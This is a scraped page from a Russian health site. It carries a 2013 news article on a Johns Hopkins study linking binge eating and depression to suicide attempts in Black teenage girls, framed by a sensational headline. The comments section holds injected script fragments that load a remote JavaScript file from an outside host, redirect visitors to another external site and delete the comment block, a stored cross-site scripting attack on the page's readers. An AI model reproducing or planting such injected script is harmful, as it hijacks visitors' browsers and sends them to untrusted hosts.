Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Переедание приводит к сам...  >>  Переедание приводит к самоубийству! Что делать?
 
Обратная связь
 

Переедание приводит к самоубийству! Что делать?

Размер шрифта
26 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Может ли переедание быть предвестником грядущего суицида? Американские ученые уверены, что между этими явлениями есть связь.

Переедание приводит к самоубийству! Что делать?

Исследование, которое возглавляла доктор Рашель Мусси, проводилось на базе Университета Джона Хопкинса. В группу испытуемых вошли 313 девушек негроидной расы. За ними наблюдали в течение 11 лет, начиная примерно с возраста 6-17 лет. Кроме того, периодически проводились интервью с учителями и родителями вышеназванных девушек.

Ученых прежде всего интересовал психологический статус испытуемых (тревожность, депрессивные настроения, самооценка, степень удовлетворения своим телом) и их пищевые привычки (в особенности – склонность к перееданию). В ходе выполнения научной работы регистрировались и анализировались любые попытки совершить самоубийство (даже исключительно демонстративные).

Вообще говоря, переедание весьма нередко встречается в среде девочек и женщин, проживающих в западных странах. И помимо очевидных отрицательных последствий для здоровья, это явление имеет и психологический аспект. Бесконтрольное потребление огромного количества еды влечет за собой чувство недовольства и презрения к себе, заставляет скрывать эту постыдную привычку.

Ученые выяснили, что недовольство своей внешностью часто предопределяет развитие тревожного и депрессивного синдрома у негритянок подросткового возраста. На фоне этого они начинают слишком много есть, что, конечно, отнюдь не делает их стройнее и прекраснее. Замыкается порочный круг.

Авторы уверены, что результаты их работы, с одной стороны, углубляют фундаментальные представления о связи между пищевым поведением и психикой, а с другой – дают клиницистам новый профилактический инструмент для борьбы с суицидами.

Так что, смотрите за своими близкими. Возможно, им требуется помощь именно от вас.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все что надо знать о бронхите   Ученые говорят, что свекровь может испортить вам жизнь после родов! Как жить?   Грустно? Вспомнили что-то плохое? Вот как бороться с плохим настроением!   Посадите родителей в интернет! Он борется с депрессией!  
19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас? 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Еда и лекарства: когда их нельзя смешивать
Проблемы, с которыми справится секс
Что такое ПМС?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.